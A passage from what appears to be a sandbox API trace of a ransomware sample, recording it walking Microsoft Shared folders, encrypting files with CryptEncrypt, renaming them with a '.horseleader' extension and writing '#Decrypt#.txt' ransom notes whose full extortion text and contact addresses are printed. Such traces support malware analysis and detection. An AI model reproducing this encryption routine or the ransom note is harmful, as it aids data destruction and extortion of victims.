Tag\\LISTS\\1033\\STOCKS.DAT.horseleader") returned 94 [0245.621] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat.horseleader")) returned 1 [0245.621] GetProcessHeap () returned 0x780000 [0245.621] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfe8 | out: hHeap=0x780000) returned 1 [0245.621] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5866b900, ftCreationTime.dwHighDateTime=0x1c29047, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x5866b900, ftLastWriteTime.dwHighDateTime=0x1c29047, nFileSizeHigh=0x0, nFileSizeLow=0xa7f, dwReserved0=0x448348bd, dwReserved1=0x6d5c4c3f, cFileName="STOCKS.XML", cAlternateFileName="")) returned 1 [0245.621] lstrcmpiW (lpString1="STOCKS.XML", lpString2="Windows") returned -1 [0245.622] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 82 [0245.622] StrStrIW (lpFirst="STOCKS.XML", lpSrch=".horseleader") returned 0x0 [0245.622] lstrcmpW (lpString1="STOCKS.XML", lpString2="#Decrypt#.txt") returned 1 [0245.622] lstrcmpW (lpString1="STOCKS.XML", lpString2="_uninstalling_.png") returned 1 [0245.622] lstrlenW (lpString=".testttjffg") returned 11 [0245.622] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML", lpSrch=".testttjffg") returned 0x0 [0245.622] CryptGenRandom (in: 
hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0245.622] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0245.622] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0245.623] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 82 [0245.623] StrStrW (lpFirst="STOCKS.XML", lpSrch=".txt") returned 0x0 [0245.623] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=2687) returned 1 [0245.623] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0xa7f, lpOverlapped=0x0) returned 1 [0245.625] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff581, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.625] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0xa7f, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0xa7f, lpOverlapped=0x0) returned 1 [0245.625] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.625] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, 
lpOverlapped=0x0) returned 1 [0245.625] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0245.626] CloseHandle (hObject=0x15c) returned 1 [0245.626] GetProcessHeap () returned 0x780000 [0245.626] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfe8 [0245.626] wnsprintfW (in: pszDest=0x7dbfe8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML.horseleader") returned 94 [0245.626] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml.horseleader")) returned 1 [0245.627] GetProcessHeap () returned 0x780000 [0245.627] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfe8 | out: hHeap=0x780000) returned 1 [0245.627] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36acb00, ftCreationTime.dwHighDateTime=0x1c2dd39, ftLastAccessTime.dwLowDateTime=0xef07e390, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x36acb00, ftLastWriteTime.dwHighDateTime=0x1c2dd39, nFileSizeHigh=0x0, nFileSizeLow=0x2174, dwReserved0=0x448348bd, dwReserved1=0x6d5c4c3f, cFileName="TIME.XML", cAlternateFileName="")) returned 1 [0245.627] lstrcmpiW (lpString1="TIME.XML", lpString2="Windows") returned -1 [0245.627] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 80 [0245.627] StrStrIW (lpFirst="TIME.XML", lpSrch=".horseleader") returned 0x0 [0245.627] lstrcmpW (lpString1="TIME.XML", lpString2="#Decrypt#.txt") returned 1 [0245.627] lstrcmpW (lpString1="TIME.XML", lpString2="_uninstalling_.png") returned 1 [0245.627] lstrlenW (lpString=".testttjffg") returned 11 [0245.627] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML", lpSrch=".testttjffg") returned 0x0 [0245.627] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0245.627] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0245.627] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0245.628] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 80 [0245.628] StrStrW (lpFirst="TIME.XML", lpSrch=".txt") returned 0x0 [0245.628] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=8564) returned 1 [0245.628] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x2174, lpOverlapped=0x0) returned 1 [0245.630] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffde8c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 
[0245.631] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x2174, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x2174, lpOverlapped=0x0) returned 1 [0245.631] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.631] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0245.631] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0245.631] CloseHandle (hObject=0x15c) returned 1 [0245.631] GetProcessHeap () returned 0x780000 [0245.631] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfe8 [0245.631] wnsprintfW (in: pszDest=0x7dbfe8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML.horseleader") returned 92 [0245.632] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml.horseleader")) returned 1 [0245.633] GetProcessHeap () returned 0x780000 [0245.633] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfe8 | out: hHeap=0x780000) returned 1 [0245.633] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: 
lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36acb00, ftCreationTime.dwHighDateTime=0x1c2dd39, ftLastAccessTime.dwLowDateTime=0xef07e390, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x36acb00, ftLastWriteTime.dwHighDateTime=0x1c2dd39, nFileSizeHigh=0x0, nFileSizeLow=0x2174, dwReserved0=0x448348bd, dwReserved1=0x6d5c4c3f, cFileName="TIME.XML", cAlternateFileName="")) returned 0 [0245.633] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0245.633] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\#Decrypt#.txt") returned 85 [0245.633] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0245.634] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0245.634] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0245.636] lstrlenA (lpString="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") returned 1368 [0245.636] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0245.636] CloseHandle (hObject=0x1a4) returned 1 [0245.636] GetProcessHeap () returned 0x780000 [0245.636] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0245.636] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11f34c00, ftCreationTime.dwHighDateTime=0x1c62260, ftLastAccessTime.dwLowDateTime=0x5f42f7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x11f34c00, ftLastWriteTime.dwHighDateTime=0x1c62260, nFileSizeHigh=0x0, nFileSizeLow=0x377ef, dwReserved0=0x33bd0262, dwReserved1=0xcc71a064, cFileName="BASMLA.XSL", cAlternateFileName="")) returned 1 [0245.636] lstrcmpiW (lpString1="BASMLA.XSL", lpString2="Windows") returned -1 [0245.636] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 77 [0245.636] StrStrIW (lpFirst="BASMLA.XSL", lpSrch=".horseleader") returned 0x0 [0245.636] lstrcmpW (lpString1="BASMLA.XSL", lpString2="#Decrypt#.txt") returned 1 [0245.637] lstrcmpW (lpString1="BASMLA.XSL", lpString2="_uninstalling_.png") returned 1 [0245.637] lstrlenW (lpString=".testttjffg") returned 11 [0245.637] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL", lpSrch=".testttjffg") returned 0x0 [0245.637] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0245.637] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0245.637] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0245.637] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 77 [0245.637] StrStrW (lpFirst="BASMLA.XSL", lpSrch=".txt") returned 0x0 [0245.637] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=227311) returned 1 [0245.638] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.638] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0245.640] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.640] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0245.641] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x193f7, lpNewFilePointer=0x0, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.641] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0245.642] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.642] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0245.642] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x327ef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.642] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0245.644] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.644] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0245.644] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.644] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0245.644] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, 
lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0245.644] CloseHandle (hObject=0x1a4) returned 1 [0245.644] GetProcessHeap () returned 0x780000 [0245.644] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0245.644] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL.horseleader") returned 89 [0245.645] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl.horseleader")) returned 1 [0245.645] GetProcessHeap () returned 0x780000 [0245.645] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0245.645] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11f34c00, ftCreationTime.dwHighDateTime=0x1c62260, ftLastAccessTime.dwLowDateTime=0x5f42f7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x11f34c00, ftLastWriteTime.dwHighDateTime=0x1c62260, nFileSizeHigh=0x0, nFileSizeLow=0x377ef, dwReserved0=0x33bd0262, dwReserved1=0xcc71a064, cFileName="BASMLA.XSL", cAlternateFileName="")) returned 0 [0245.646] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0245.646] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\#Decrypt#.txt") returned 80 [0245.646] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\Smart Tag\\LISTS\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.647] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0245.647] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0245.648] lstrlenA (lpString="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") returned 1368 [0245.648] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0245.648] CloseHandle (hObject=0x158) returned 1 [0245.648] GetProcessHeap () returned 0x780000 [0245.648] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.648] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93e94600, ftCreationTime.dwHighDateTime=0x1ca9120, ftLastAccessTime.dwLowDateTime=0x583906f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x93e94600, ftLastWriteTime.dwHighDateTime=0x1ca9120, nFileSizeHigh=0x0, nFileSizeLow=0x1b180, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="METCONV.DLL", cAlternateFileName="")) returned 1 [0245.648] lstrcmpiW (lpString1="METCONV.DLL", lpString2="Windows") returned -1 [0245.648] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.DLL") returned 72 [0245.648] StrStrIW (lpFirst="METCONV.DLL", lpSrch=".horseleader") returned 0x0 [0245.649] lstrcmpW (lpString1="METCONV.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.649] lstrcmpW (lpString1="METCONV.DLL", lpString2="_uninstalling_.png") returned 1 [0245.649] lstrlenW (lpString=".testttjffg") returned 11 [0245.649] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\Smart Tag\\METCONV.DLL", lpSrch=".testttjffg") returned 0x0 [0245.649] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.649] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.649] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.651] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.DLL") returned 72 [0245.651] StrStrW (lpFirst="METCONV.DLL", lpSrch=".txt") returned 0x0 [0245.651] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=110976) returned 1 [0245.651] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.652] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.654] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.654] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, 